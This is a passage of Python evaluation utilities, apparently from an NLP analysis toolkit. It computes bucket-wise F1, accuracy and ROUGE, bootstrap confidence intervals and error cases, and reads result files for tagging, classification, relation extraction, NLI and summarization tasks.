# acc = np.mean(accs)
return f1, p, r
def evaluate_chunk_level(pred_chunks,true_chunks):
# print(len(pred_chunks), len(true_chunks))
# if len(pred_chunks) != len(true_chunks):
# print("Error!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!: len(pred_chunks) != len(true_chunks)")
# exit()
correct_preds, total_correct, total_preds = 0., 0., 0.
correct_preds = len(set(true_chunks) & set(pred_chunks))
total_preds = len(pred_chunks)
total_correct = len(true_chunks)
# print("****** debug *************")
# print("correct_preds:\t", correct_preds)
# print("total_preds:\t", total_preds)
# print("total_correct:\t", total_correct)
p = correct_preds / total_preds if correct_preds > 0 else 0
r = correct_preds / total_correct if correct_preds > 0 else 0
f1 = 2 * p * r / (p + r) if correct_preds > 0 else 0
# acc = np.mean(accs)
return f1, p, r
def evaluate_each_class_listone(words,labels_pred, labels,class_type):
'''
words,labels_pred, labels is list
eg: labels = [b-per, i-per,b-org,o,o,o, ...]
:return:
'''
correct_preds, total_correct, total_preds = 0., 0., 0.
correct_preds_cla_type, total_preds_cla_type, total_correct_cla_type = 0., 0., 0.
lab_pre_class_type =[]
lab_class_type =[]
true_chunks = get_chunks(labels)
pred_chunks = get_chunks(labels_pred)
for i in range(len(pred_chunks)):
if pred_chunks[i][0] == class_type:
lab_pre_class_type.append(pred_chunks[i])
lab_pre_class_type_c = set(lab_pre_class_type)
for i in range(len(true_chunks)):
if true_chunks[i][0] == class_type:
lab_class_type.append(true_chunks[i])
lab_class_type_c = set(lab_class_type)
lab_chunksss = set(true_chunks)
correct_preds_cla_type += len(lab_pre_class_type_c & lab_chunksss)
total_preds_cla_type += len(lab_pre_class_type_c)
total_correct_cla_type += len(lab_class_type_c)
p = correct_preds_cla_type / total_preds_cla_type if correct_preds_cla_type > 0 else 0
r = correct_preds_cla_type / total_correct_cla_type if correct_preds_cla_type > 0 else 0
f1 = 2 * p * r / (p + r) if correct_preds_cla_type > 0 else 0
# acc = np.mean(accs)
return f1, p, r,len(lab_class_type)
# if __name__ == '__main__':
# max_sent = 10
# tags = {'0': 0,
# 'B-PER': 1, 'I-PER': 2,
# 'B-LOC': 3, 'I-LOC': 4,
# 'B-ORG': 5, 'I-ORG': 6,
# 'B-OTHER': 7, 'I-OTHER': 8,
# 'O': 9}
# labels_pred = [
# [9, 9, 9, 1, 3, 1, 2, 2, 0, 0],
# [9, 9, 9, 1, 3, 1, 2, 0, 0, 0]
# ]
# labels = [
# [9, 9, 9, 9, 3, 1, 2, 2, 0, 0],
# [9, 9, 9, 9, 3, 1, 2, 2, 0, 0]
# ]
# words = [
# [0, 0, 0, 0, 0, 3, 6, 8, 5, 7],
# [0, 0, 0, 4, 5, 6, 7, 9, 1, 7]
# ]
# id_to_vocb = {0: 'a', 1: 'b', 2: 'c', 3: 'd', 4: 'e', 5: 'f', 6: 'g', 7: 'h', 8: 'i', 9: 'j'}
# class_type = 'PER'
# acc, f1, p, r = evaluate(labels_pred, labels, words, tags, max_sent, id_to_vocb)
# print acc, f1, p, r
# f1, p, r = evaluate_each_class(labels_pred, labels, words, tags, max_sent, id_to_vocb, class_type)
# print f1, p, r
def format4json(sent):
sent = sent.replace(":"," ").replace("\"","").replace("\'","").replace("/","").replace("\\","").replace("{","").replace("}","")
sent = sent.replace("\"","")
return sent
def cap_feature(s):
"""
Capitalization feature:
0 = low caps
1 = all caps
2 = first letter caps
3 = one capital (not first letter)
"""
if s.lower() == s:
return "low_caps"
elif s.upper() == s:
return "full_caps"
elif s[0].upper() == s[0]:
return "first_caps"
else:
return "not_first_caps"
def dict_char2word(sentence):
ind_w = 0
dict_c2w = {}
for ind, c in enumerate(sentence):
dict_c2w[ind] = ind_w
if c ==" ":
ind_w += 1
return dict_c2w
def get_sample_rate(n_data):
res = 0.8
if n_data > 300000:
res = 0.1
elif n_data > 100000 and n_data < 300000:
res = 0.2
return res
def mean_confidence_interval(data, confidence=0.95):
a = 1.0 * np.array(data)
n = len(a)
m, se = np.mean(a), scipy.stats.sem(a)
h = se * scipy.stats.t.ppf((1 + confidence) / 2., n-1)
return m-h, m+h
def compute_confidence_interval_acc(true_label_list, pred_label_list, n_times=1000):
n_data = len(true_label_list)
sample_rate = get_sample_rate(n_data)
n_sampling = int(n_data * sample_rate)
if n_sampling == 0:
n_sampling = 1
print("n_data:\t", n_data)
print("sample_rate:\t", sample_rate)
print("n_sampling:\t", n_sampling)
performance_list = []
confidence_low, confidence_up = 0,0
for i in range(n_times):
sample_index_list = choices(range(n_data), k=n_sampling)
performance = accuracy(list(np.array(true_label_list)[sample_index_list]),
list(np.array(pred_label_list)[sample_index_list]))
performance_list.append(performance)
if n_times != 1000:
confidence_low, confidence_up = mean_confidence_interval(performance_list)
else:
performance_list.sort()
confidence_low = performance_list[24]
confidence_up = performance_list[974]
print("\n")
print("confidence_low:\t", confidence_low)
print("confidence_up:\t", confidence_up)
return confidence_low, confidence_up
# 1000
def compute_confidence_interval_f1(spans_true, spans_pred, dict_span2sid, dict_span2sid_pred, n_times=1000):
n_data = len(dict_span2sid)
sample_rate = get_sample_rate(n_data)
n_sampling = int(n_data * sample_rate)
print("sample_rate:\t", sample_rate)
print("n_sampling:\t", n_sampling)
dict_sid2span_salient = {}
for span in spans_true:
#print(span)
if len(span.split("_"))!=3:
break
sid = dict_span2sid[span]
if sid in dict_sid2span_salient.keys():
dict_sid2span_salient[sid].append(span)
else:
dict_sid2span_salient[sid] = [span]
dict_sid2span_salient_pred = {}
for span in spans_pred:
sid = dict_span2sid_pred[span]
if sid in dict_sid2span_salient_pred.keys():
dict_sid2span_salient_pred[sid].append(span)
else:
dict_sid2span_salient_pred[sid] = [span]
performance_list = []
confidence_low, confidence_up = 0,0
for i in range(n_times):
sample_index_list = choices(range(n_data), k=n_sampling)
true_label_bootstrap_list = []
pred_label_bootstrap_list = []
for ind, sid in enumerate(sample_index_list):
if sid in dict_sid2span_salient.keys():
true_label_list = dict_sid2span_salient[sid]
true_label_list_revised = [true_label + "_" + str(ind) for true_label in true_label_list]
true_label_bootstrap_list += true_label_list_revised
if sid in dict_sid2span_salient_pred.keys():
pred_label_list = dict_sid2span_salient_pred[sid]
pred_label_list_revised = [pred_label + "_" + str(ind) for pred_label in pred_label_list]
pred_label_bootstrap_list += pred_label_list_revised
f1, p, r = evaluate_chunk_level(pred_label_bootstrap_list, true_label_bootstrap_list)
performance_list.append(f1)
if n_times != 1000:
confidence_low, confidence_up = mean_confidence_interval(performance_list)
else:
performance_list.sort()
confidence_low = performance_list[24]
confidence_up = performance_list[974]
# print("\n")
# print("confidence_low:\t", confidence_low)
# print("confidence_up:\t", confidence_up)
return confidence_low, confidence_up
################ Calculate Bucket-wise F1 Score:
def getBucketF1(dict_bucket2span, dict_bucket2span_pred, dict_span2sid, dict_span2sid_pred):
print('------------------ attribute')
dict_bucket2f1 = {}
for bucket_interval, spans_true in dict_bucket2span.items():
spans_pred = []
#print('bucket_interval: ',bucket_interval)
if bucket_interval not in dict_bucket2span_pred.keys():
#print(bucket_interval)
raise ValueError("Predict Label Bucketing Errors")
else:
spans_pred = dict_bucket2span_pred[bucket_interval]
# print("debug----------")
# print(len(dict_span2sid))
# print(len(dict_span2sid_pred))
confidence_low, confidence_up = compute_confidence_interval_f1(spans_true, spans_pred, dict_span2sid, dict_span2sid_pred)
confidence_low = format(confidence_low , '.3g')
confidence_up = format(confidence_up, '.3g')
f1, p, r = evaluate_chunk_level(spans_pred, spans_true)
print("-----------print spans_pred -------------")
print(spans_pred)
print("confidence_low:\t", confidence_low)
print("confidence_up:\t", confidence_up)
print("F1:\t", f1)
print("------------------------------------------")
dict_bucket2f1[bucket_interval] = [f1, len(spans_true), confidence_low, confidence_up]
# if bucket_interval[0] == 1.0:
# print("debug-f1:",f1)
# print(spans_pred[0:20])
# print(spans_true[0:20])
# print("dict_bucket2f1: ",dict_bucket2f1)
return sortDict(dict_bucket2f1)
# dict_chunkid2spanSent: 2_3 -> New York|||This is New York city
# dict_pos2tag: 2_3 -> NER
def get_errorCase(dict_pos2tag, dict_pos2tag_pred, dict_chunkid2spanSent, dict_chunkid2spanSent_pred):
errorCase_list = []
for pos, tag in dict_pos2tag.items():
true_label = tag
pred_label = ""
#print(dict_chunkid2spanSent.keys())
if pos+"_"+tag not in dict_chunkid2spanSent.keys():
continue
span_sentence = dict_chunkid2spanSent[pos+"_"+tag]
if pos in dict_pos2tag_pred.keys():
pred_label = dict_pos2tag_pred[pos]
if true_label == pred_label:
continue
else:
pred_label = "O"
error_case = span_sentence + "|||" + true_label + "|||" + pred_label
errorCase_list.append(error_case)
for pos, tag in dict_pos2tag_pred.items():
true_label = ""
pred_label = tag
if pos+"_"+tag not in dict_chunkid2spanSent_pred.keys():
continue
span_sentence = dict_chunkid2spanSent_pred[pos+"_"+tag]
if pos in dict_pos2tag.keys():
true_label = dict_pos2tag[pos]
if true_label == pred_label:
continue
else:
true_label = "O"
error_case = span_sentence + "|||" + true_label + "|||" + pred_label
errorCase_list.append(error_case)
#print(errorCase_list)
return errorCase_list
################ Calculate Bucket-wise F1 Score:
def getBucketF1_ner(dict_bucket2span, dict_bucket2span_pred, dict_span2sid, dict_span2sid_pred, dict_chunkid2span, dict_chunkid2span_pred, is_print_ci, is_print_case):
#print('------------------ attribute')
dict_bucket2f1 = {}
# predict: 2_3 -> NER
dict_pos2tag_pred = {}
for k_bucket_eval, spans_pred in dict_bucket2span_pred.items():
for span_pred in spans_pred:
pos_pred = "_".join(span_pred.split("_")[0:2])
tag_pred = span_pred.split("_")[-1]
dict_pos2tag_pred[pos_pred] = tag_pred
#print(dict_pos2tag_pred)
# true: 2_3 -> NER
dict_pos2tag = {}
for k_bucket_eval, spans in dict_bucket2span.items():
for span in spans:
pos = "_".join(span.split("_")[0:2])
tag = span.split("_")[-1]
dict_pos2tag[pos] = tag
# print(dict_pos2tag_pred)
errorCase_list = get_errorCase(dict_pos2tag, dict_pos2tag_pred, dict_chunkid2span, dict_chunkid2span_pred)
for bucket_interval, spans_true in dict_bucket2span.items():
spans_pred = []
#print('bucket_interval: ',bucket_interval)
if bucket_interval not in dict_bucket2span_pred.keys():
#print(bucket_interval)
raise ValueError("Predict Label Bucketing Errors")
else:
spans_pred = dict_bucket2span_pred[bucket_interval]
confidence_low, confidence_up = 0,0
if is_print_ci:
confidence_low, confidence_up = compute_confidence_interval_f1(spans_true, spans_pred, dict_span2sid, dict_span2sid_pred)
confidence_low = format(confidence_low , '.3g')
confidence_up = format(confidence_up, '.3g')
f1, p, r = evaluate_chunk_level(spans_pred, spans_true)
#print("-----------print spans_pred -------------")
error_entity_list = []
if is_print_case:
for span_true in spans_true:
if span_true not in spans_pred:
#print(span_true)
pos_true = "_".join(span_true.split("_")[0:2])
tag_true = span_true.split("_")[-1]
if pos_true in dict_pos2tag_pred.keys():
tag_pred = dict_pos2tag_pred[pos_true]
if tag_pred != tag_true:
error_entity_list.append(dict_chunkid2span[span_true] + "|||" + tag_true + "|||" + dict_pos2tag_pred[pos_true])
else:
error_entity_list.append(dict_chunkid2span[span_true] + "|||" + tag_true + "|||" + "O")
#print("confidence_low:\t", confidence_low)
#print("confidence_up:\t", confidence_up)
#print("F1:\t", f1)
#print(error_entity_list)
#print("------------------------------------------")
dict_bucket2f1[bucket_interval] = [f1, len(spans_true), confidence_low, confidence_up, error_entity_list]
# if bucket_interval[0] == 1.0:
# print("debug-f1:",f1)
# print(spans_pred[0:20])
# print(spans_true[0:20])
# print("dict_bucket2f1: ",dict_bucket2f1)
return sortDict(dict_bucket2f1), errorCase_list
def getBucketAcc(dict_bucket2span, dict_bucket2span_pred):
print('------------------ attribute')
dict_bucket2f1 = {}
for bucket_interval, spans_true in dict_bucket2span.items():
spans_pred = []
print('bucket_interval: ',bucket_interval)
if bucket_interval not in dict_bucket2span_pred.keys():
#print(bucket_interval)
raise ValueError("Predict Label Bucketing Errors")
else:
spans_pred = dict_bucket2span_pred[bucket_interval]
accuracy_each_bucket = accuracy(spans_pred, spans_true)
confidence_low, confidence_up = compute_confidence_interval_acc(spans_pred, spans_true)
dict_bucket2f1[bucket_interval] = [accuracy_each_bucket, len(spans_true), confidence_low, confidence_up]
print("accuracy_each_bucket:\t", accuracy_each_bucket)
return sortDict(dict_bucket2f1)
################ Calculate Bucket-wise F1 Score:
def getBucketROUGE(dict_bucket2span):
print('------------------ attribute')
dict_bucket2f1 = {}
for bucket_interval, spans_true in dict_bucket2span.items():
spans_pred = []
rouge_list = [float(sample_pos.split("_")[-1]) for sample_pos in spans_true]
avg_rouge = np.average(rouge_list)
print('bucket_interval: ',bucket_interval)
dict_bucket2f1[bucket_interval] = [avg_rouge, len(spans_true)]
return sortDict(dict_bucket2f1)
def compute_holistic_f1_re(path, delimiter = "\t"):
fin = open(path, "r")
true_list = []
pred_list = []
for line in fin:
if len(line.split("\t"))!=3:
#print(line)
continue
line = line.rstrip()
true_list.append(line.split("\t")[-2])
pred_list.append(line.split("\t")[-1])
f1 = f1_score(true_list, pred_list, average='micro')
# print(true_list[0:10])
# print(pred_list[0:10])
# print("------f1-----------")
# print(f1)
#exit()
return f1
def compute_holistic_f1(fn_result, delimiter = " "):
if delimiter == " ":
cmd = 'perl %s -d \"\t\" < %s' % (os.path.join('.', 'conlleval'), fn_result)
msg = '\nStandard CoNNL perl script (author: Erik Tjong Kim Sang <erikt@uia.ua.ac.be>, version: 2004-01-26):\n'
msg += ''.join(os.popen(cmd).readlines())
print("result: ",msg)
f1 = float(msg.split('\n')[3].split(':')[-1].strip())
return f1
def accuracy(labels, predictions, language=None):
correct = sum([int(p == l) for p, l in zip(predictions, labels)])
accuracy = float(correct) / len(predictions)
return accuracy*100
def get_ci_interval(confidence_val, confidence_delta):
info = "(" + str(confidence_val) + "-" + str(confidence_delta) + ", " + str(confidence_val) + "+" + str(
confidence_delta) + ")"
return info
def distance(text_sents, summary_sents):
density, coverage, compression, copy_len, novelty_1, novelty_2, repetition_1, repetition_2 = 0,0,0,0,0,0,0,0
fragment = Fragments("\n".join(summary_sents), " ".join(text_sents))
compression = len(text_sents.split(" "))/len(summary_sents.split(" "))
density = fragment.density()
# coverage = fragment.coverage()
# compression = fragment.compression()
copy_len = 0 if len(fragment.copy_len()) == 0 else sum(fragment.copy_len()) / len(fragment.copy_len())
novelty_1 = novelty_oneSample(text_sents, summary_sents, 1)
novelty_2 = novelty_oneSample(text_sents, summary_sents, 2)
repetition_1 = repetition_oneSample(summary_sents, 1)
# repetition_2 = repetition_oneSample(summary_sents, 2)
print(density, coverage, compression, copy_len, novelty_1, novelty_2, repetition_1, repetition_2)
return density, coverage, compression, copy_len, novelty_1, novelty_2, repetition_1, repetition_2
def list_minus(a, b):
return [tmpa - tmpb for tmpa, tmpb in zip(a, b)]
def get_avg(res):
result = {}
for key, value in res.items():
if isinstance(value, list):
result[key] = sum(value) / len(value)
else:
result[key] = value
return result
def wordSegment2(sent):
tknzr = TweetTokenizer()
token_list = tknzr.tokenize(sent)
return token_list
def wordSegment(sent):
if len(sent.split(" ")) == 1 and len(list(sent)) >= 10:
return " ".join(list(sent))
else:
return sent
def intervalTransformer(inter_list):
dict_old2new = {}
last = 0
for ind, interval in enumerate(inter_list):
if ind == 0:
last = interval[0]
if len(interval) == 1:
#new_inter_list.append(interval)
dict_old2new[interval] = interval
last = interval[0]
else:
#new_inter_list.append((last, interval[1]))
dict_old2new[interval] = (last, interval[1])
last = interval[1]
return dict_old2new
def sortDict(dict_obj, flag = "key"):
sorted_dict_obj = []
if flag == "key":
sorted_dict_obj = sorted(dict_obj.items(), key=lambda item:item[0])
elif flag == "value":
#dict_bucket2span_
sorted_dict_obj = sorted(dict_obj.items(), key=lambda item:len(item[1]), reverse = True)
return dict(sorted_dict_obj)
def reverseDict(dict_a2b):
dict_b2a = {}
for k, v in dict_a2b.items():
v = float(v)
if v not in dict_b2a.keys():
dict_b2a[float(v)] = [k]
else:
dict_b2a[float(v)].append(k)
return dict_b2a
def reverseDict_discrete(dict_a2b):
dict_b2a = {}
for k, v in dict_a2b.items():
if v not in dict_b2a.keys():
dict_b2a[v] = [k]
else:
dict_b2a[v].append(k)
return dict_b2a
def findKey(dict_obj, x):
for k, v in dict_obj.items():
if len(k) == 1:
if x == k[0]:
return k
elif len(k) ==2 and x >= k[0] and x <= k[1]: # Attention !!!
return k
def tuple2str(triplet):
res = ""
for v in triplet:
res += str(v) + "|||"
return res.rstrip("|||")
def bucketAttribute_SpecifiedBucketValue(dict_span2attVal, n_buckets, hardcoded_bucket_values):
################ Bucketing different Attributes
# hardcoded_bucket_values = [set([float(0), float(1)])]
#print("!!!debug-7--")
p_infinity = 1000000
n_infinity = -1000000
n_spans = len(dict_span2attVal)
dict_attVal2span = reverseDict(dict_span2attVal)
dict_attVal2span = sortDict(dict_attVal2span)
dict_bucket2span = {}
for backet_value in hardcoded_bucket_values:
if backet_value in dict_attVal2span.keys():
#print("------------work!!!!---------")
#print(backet_value)
dict_bucket2span[(backet_value,)] = dict_attVal2span[backet_value]
n_spans -= len(dict_attVal2span[backet_value])
n_buckets -= 1
avg_entity = n_spans * 1.0 / n_buckets
n_tmp = 0
entity_list = []
val_list = []
#
#print("-----avg_entity----------")
#print(avg_entity)
for attval, entity in dict_attVal2span.items():
if attval in hardcoded_bucket_values:
continue
# print("debug-attval:\t",attval)
val_list.append(attval)
entity_list += entity
n_tmp += len(entity)
# print(attval)
# print(n_tmp, avg_entity)
if n_tmp > avg_entity:
if len(val_list) >=2:
key_bucket = (val_list[0], val_list[-1])
dict_bucket2span[key_bucket] = entity_list
#print("debug key bucket:\t", key_bucket)
else:
dict_bucket2span[(val_list[0],)] = entity_list
entity_list = []
n_tmp = 0
val_list = []
if n_tmp != 0:
if n_buckets == 1:
dict_bucket2span[(n_infinity,p_infinity)] = entity_list
else:
if val_list[0] <=1:
p_infinity = 1.0
#print("!!!!!-debug-2")
if len(val_list) >=2:
key_bucket = (val_list[0], p_infinity)
dict_bucket2span[key_bucket] = entity_list
else:
dict_bucket2span[(val_list[0],p_infinity)] = entity_list # fix bugs
#
#
#
# [(0,), (0.1, 0.2), (0.3,0.4), (0.5, 0.6)] --> [(0,), (0,0.2), (0.2, 0.4), (0.4, 0.6)]
# dict_old2new = intervalTransformer(dict_bucket2span.keys())
# dict_bucket2span_new = {}
# for inter_list, span_list in dict_bucket2span.items():
# dict_bucket2span_new[dict_old2new[inter_list]] = span_list
return dict_bucket2span
def bucketAttribute_DiscreteValue(dict_span2attVal = None, n_buckets = 100000000, n_entities = 1):
################ Bucketing different Attributes
#print("!!!!!debug---------")
# hardcoded_bucket_values = [set([float(0), float(1)])]
n_spans = len(dict_span2attVal)
dict_bucket2span = {}
dict_attVal2span = reverseDict_discrete(dict_span2attVal)
dict_attVal2span = sortDict(dict_attVal2span, flag = "value")
# dict["q_id"] = 2
avg_entity = n_spans * 1.0 / n_buckets
n_tmp = 0
entity_list = []
val_list = []
n_total = 1
for attval, entity in dict_attVal2span.items():
if len(entity) < n_entities or n_total > n_buckets:
break
dict_bucket2span[(attval,)] = entity
n_total += 1
return dict_bucket2span
def bucketAttribute_SpecifiedBucketInterval(dict_span2attVal, intervals):
################ Bucketing different Attributes
#hardcoded_bucket_values = [set([float(0), float(1)])]
#intervals = [0, (0,0.5], (0.5,0.9], (0.99,1]]
dict_bucket2span = {}
n_spans = len(dict_span2attVal)
#print("!!!!!!!enter into bucketAttribute_SpecifiedBucketInterval")
#print(intervals)
if type(list(intervals)[0][0]) == type("string"): # discrete value, such as entity tags
dict_attVal2span = reverseDict_discrete(dict_span2attVal)
dict_attVal2span = sortDict(dict_attVal2span, flag = "value")
for attval, entity in dict_attVal2span.items():
attval_tuple = (attval,)
if attval_tuple in intervals:
if attval_tuple not in dict_bucket2span.keys():
dict_bucket2span[attval_tuple] = entity
else:
dict_bucket2span[attval_tuple] += entity
for val in intervals:
if val not in dict_bucket2span.keys():
dict_bucket2span[val] = []
# print("dict_bucket2span: ",dict_bucket2span)
else:
#print("---debug----5")
#print(intervals)
dict_attVal2span = reverseDict(dict_span2attVal)
dict_attVal2span = sortDict(dict_attVal2span)
for v in intervals:
if len(v) == 1:
dict_bucket2span[v] = []
else:
dict_bucket2span[v] = []
# print("debug-interval:\t", intervals)
for attval, entity in dict_attVal2span.items():
res_key = findKey(dict_bucket2span, attval)
#print("res-key:\t"+ str(res_key))
if res_key == None:
continue
dict_bucket2span[res_key] += entity
return dict_bucket2span
def printDict(dict_obj, info="dict"):
#print("-----------------------------------------------")
print("the information of #" + info + "#")
print("Bucket_interval\tF1\tEntity-Number")
for k,v in dict_obj.items():
if len(k) == 1:
print("[" + str(k[0])+",]" + "\t" + str(v[0]) + "\t" + str(v[1]))
else:
print("[" + str(k[0])+", " + str(k[1]) +"]" + "\t" + str(v[0]) + "\t" + str(v[1]))
print("")
def extValue(cont, fr, to):
return cont.split(fr)[-1].split(to)[0]
def loadConf(path_conf):
fin = open(path_conf,"r")
all_cont = fin.read()
dict_aspect_func={}
for block in all_cont.split("# "):
# print("debug3-------")
# print(block)
notation = extValue(block, "notation:\t", "\n").rstrip(" ")
if notation == "":
continue
# print("debug4--notation-----")
# print(notation)
func_type = extValue(block, "type:\t", "\n").rstrip(" ")
func_setting = extValue(block, "setting:\t", "\n").rstrip(" ")
is_preComputed = extValue(block, "is_preComputed:\t", "\n").rstrip(" ")
dict_aspect_func[notation] = (func_type, func_setting, is_preComputed)
# exit()
return dict_aspect_func
def ensureDir(f):
if not os.path.exists(f):
os.makedirs(f)
def load_json(path):
with open(path, "r") as f:
json_template = json.load(f)
# steps = [Step.from_dict(step_dict) for step_dict in schemas["steps"]]
return json_template
def save_json(obj_json, path):
with open(path, "w") as f:
json.dump(obj_json, f, indent=4, ensure_ascii=False)
def getPos2SentId(test_word_sequences_sent):
dict_pos2sid = {}
pos = 0
for sid, sent in enumerate(test_word_sequences_sent):
for i in range(len(sent)):
dict_pos2sid[pos] = sid
pos += 1
return dict_pos2sid
def getTokenPosition(test_word_sequences_sent):
dict_ap2rp = {}
pos = 0
for sid, sent in enumerate(test_word_sequences_sent):
for i in range(len(sent)):
dict_ap2rp[pos] = i
pos += 1
return dict_ap2rp
def file2list(path_file):
res_list = []
fin = open(path_file,"r")
for line in fin:
line = line.rstrip("\n")
res_list.append(line)
fin.close()
return res_list
def file_to_list_triple(path_file):
sent_list = []
true_label_list = []
pred_label_list = []
fin = open(path_file,"r")
for line in fin:
line = line.rstrip("\n")
if len(line.split("\t")) !=3:
continue
sent, true_label, pred_label = line.split("\t")[0], line.split("\t")[1], line.split("\t")[2]
sent_list.append(sent)
true_label_list.append(true_label)
pred_label_list.append(pred_label)
fin.close()
return sent_list, true_label_list, pred_label_list
def file_to_list_tc(path_file):
sent_list = []
true_label_list = []
pred_label_list = []
fin = open(path_file,"r")
for line in fin:
line = line.rstrip("\n")
if len(line.split("\t")) !=5:
continue
sent, true_label, pred_label = line.split("\t")[0], line.split("\t")[1], line.split("\t")[2]
sent_list.append(sent)
true_label_list.append(true_label)
pred_label_list.append(pred_label)
fin.close()
return sent_list, true_label_list, pred_label_list
def file_to_list_re(file_path):
sample_list = []
fin = open(file_path,"r")
true_list = []
pred_list = []
sent_list = []
entity_list = []
for idx, line in enumerate(fin):
if idx == 0:
continue
info_list = line.rstrip("\n").split("\t")
sample_list.append([info for info in info_list])
true_list.append(info_list[3])
pred_list.append(info_list[4])
sent_list.append(info_list[0])
entity_list.append(info_list[1])
return sample_list, sent_list, entity_list, true_list, pred_list
def file_to_list_nli(path_file):
sent1_list = []
sent2_list = []
true_label_list = []
pred_label_list = []
fin = open(path_file,"r")
for line in fin:
line = line.rstrip("\n")
if len(line.split("\t")) <4:
continue
sent1, sent2, true_label, pred_label = line.split("\t")[0], line.split("\t")[1], line.split("\t")[2], line.split("\t")[3]
sent1_list.append(sent1)
sent2_list.append(sent2)
true_label_list.append(true_label)
pred_label_list.append(pred_label)
fin.close()
return sent1_list, sent2_list, true_label_list, pred_label_list
def file_to_list_absa(path_file):
sent1_list = []
sent2_list = []
true_label_list = []
pred_label_list = []
fin = open(path_file,"r")
for line in fin:
line = line.rstrip("\n")
if len(line.split("\t")) <4:
continue
sent1, sent2, true_label, pred_label = line.split("\t")[0], line.split("\t")[1], line.split("\t")[2], line.split("\t")[3]
sent1_list.append(sent1)
sent2_list.append(sent2)
true_label_list.append(true_label)
pred_label_list.append(pred_label)
fin.close()
return sent1_list, sent2_list, true_label_list, pred_label_list
def file_to_list_summ(path_file):
doc_list = []
hyp_list = []
ref_list = []
r1 = []
r2 = []
rl = []
r1_overall = []
r2_overall = []
rl_overall = []
fin = open(path_file,"r")
for line in fin:
line = line.rstrip("\n")
if len(line.split("\t")) <9:
continue
sent, true_label, pred_label = line.split("\t")[0], line.split("\t")[1], line.split("\t")[2]
doc_list.append(line.split("\t")[0])
hyp_list.append(line.split("\t")[1])
ref_list.append(line.split("\t")[2])
r1.append(line.split("\t")[3])
r2.append(line.split("\t")[4])
rl.append(line.split("\t")[5])
r1_overall.append(line.split("\t")[6])
r2_overall.append(line.split("\t")[7])
rl_overall.append(line.split("\t")[8])
fin.close()
return doc_list, hyp_list, ref_list, r1, r2, rl, r1_overall, r2_overall, rl_overall
def file2listPair(path_file):
sent1_list = []
sent2_list = []
fin = open(path_file,"r")
for line in fin:
line = line.rstrip("\n")
sent1, sent2 = line.split("\t")[0], line.split("\t")[1]
sent1_list.append(sent1)
sent2_list.append(sent2)
fin.close()
return sent1_list, sent2_list
def file2list_firstColumn(path_file):
res_list = []
fin = open(path_file,"r")
for line in fin:
line = line.rstrip("\n").split("\t")[0]
res_list.append(line)
fin.close()
return res_list
def file2dict(path_file):
res_dict = {}
fin = open(path_file,"r")
for line in fin:
line = line.rstrip("\n")
sent_id, sent = line.split("\t")
res_dict[sent_id] = sent
fin.close()
return res_dict
def read_tag_pos(file):
labels = []
example = []
labels_holistic = []
with open(file, 'r') as f:
for line in f:
line = line.strip()
if line:
example.append("B-"+line)
#print("B"+line)
labels_holistic.append("B-"+line)
else:
labels.append(example)
example = []
if example:
labels.append(example)
return labels, labels_holistic
# def read_tag(file):
# labels = []
# example = []
# with open(file, 'r') as f:
# for line in f:
# line = line.strip()
# if line:
# example.append(line)
# else:
# labels.append(example)
# example = []
# if example:
# labels.append(example)
# return labels
def read_text_pos(file):
labels = []
example = []
labels_holistic = []
with open(file, 'r') as f:
for line in f:
line = line.strip()
if line:
line = line.split("\t")[0]
example.append(line)
labels_holistic.append(line)
else:
labels.append(example)
example = []
if example:
labels.append(example)
return labels, labels_holistic
def read_tag(file):
labels = []
example = []
labels_holistic = []
with open(file, 'r') as f:
for line in f:
line = line.strip()
if line:
example.append(line)
labels_holistic.append(line)
else:
labels.append(example)
example = []
if example:
labels.append(example)
return labels, labels_holistic
def read_single_column(file,k):
labels = []
example = []
labels_holistic = []
with open(file, 'r') as f:
for line in f:
line = line.strip()
if line:
if len(line.split("\t")) !=3:
print(line)
example.append(line.split("\t")[k])
labels_holistic.append(line.split("\t")[k])
else:
labels.append(example)
example = []
if example:
labels.append(example)
return labels, labels_holistic
def bucc_f1(labels, predictions, language=None):
labels = set([tuple(l.split('\t')) for l in labels])
predictions = set([tuple(l.split('\t')) for l in predictions])
ncorrect = len(labels.intersection(predictions))
if ncorrect > 0:
precision = ncorrect / len(predictions)
recall = ncorrect / len(labels)
f1 = 2 * precision * recall / (precision + recall)
else:
precision = recall = f1 = 0
return {'f1': f1 * 100, 'precision': precision * 100, 'recall': recall * 100}
def f1(labels, predictions, language=None):
f1 = f1_score(labels, predictions)
precision = precision_score(labels, predictions)
recall = recall_score(labels, predictions)
return {'f1': f1 * 100, 'precision': precision * 100, 'recall': recall * 100}
def format4json_tc(sent):
sent = sent.replace(":"," ").replace("\"","").replace("\'","").replace("/","").replace("\\","").replace("{","").replace("}","")
sent = sent.replace("\"","").replace("\\n","").replace("\\n\\n","").replace("\\\"\"\"","")
if len(sent.split(" ")) > 521:
wordlist = sent.split(" ")[:520]
sent = " ".join(wordlist) + " ... "
return sent
def getErrorCase_tc(sent_list, true_label_list, pred_label_list):
errorCase_list = []
for sent, true_label, pred_label in zip(sent_list, true_label_list, pred_label_list):
if true_label != pred_label:
errorCase_list.append(true_label + "|||" + pred_label +"|||" + format4json_tc(sent))
return errorCase_list
def getErrorCase_re(sent_list, entity_list, true_label_list, pred_label_list):
errorCase_list = []
for sent, entities, true_label, pred_label in zip(sent_list, entity_list, true_label_list, pred_label_list):
if true_label != pred_label:
errorCase_list.append(true_label + "|||" + pred_label +"|||" + entities + "|||" + format4json_tc(sent))
return errorCase_list
def getBucketAcc_with_errorCase(dict_bucket2span, dict_bucket2span_pred, dict_sid2sent, is_print_ci, is_print_case):
# The structure of span_true or span_pred
# 2345|||Positive
# 2345 represents sentence id
# Positive represents the "label" of this instance
dict_bucket2f1 = {}
for bucket_interval, spans_true in dict_bucket2span.items():
spans_pred = []
if bucket_interval not in dict_bucket2span_pred.keys():
raise ValueError("Predict Label Bucketing Errors")
else:
spans_pred = dict_bucket2span_pred[bucket_interval]
# loop over samples from a given bucket
error_case_bucket_list = []
if is_print_case:
for info_true, info_pred in zip(spans_true, spans_pred):
sid_true, label_true = info_true.split("|||")
sid_pred, label_pred = info_pred.split("|||")
if sid_true != sid_pred:
continue
sent = dict_sid2sent[sid_true]
if label_true != label_pred:
error_case_info = label_true + "|||" + label_pred + "|||" + sent
error_case_bucket_list.append(error_case_info)
accuracy_each_bucket = accuracy(spans_pred, spans_true)
confidence_low, confidence_up = 0,0
if is_print_ci:
confidence_low, confidence_up = compute_confidence_interval_acc(spans_pred, spans_true)
dict_bucket2f1[bucket_interval] = [accuracy_each_bucket, len(spans_true), confidence_low, confidence_up, error_case_bucket_list]
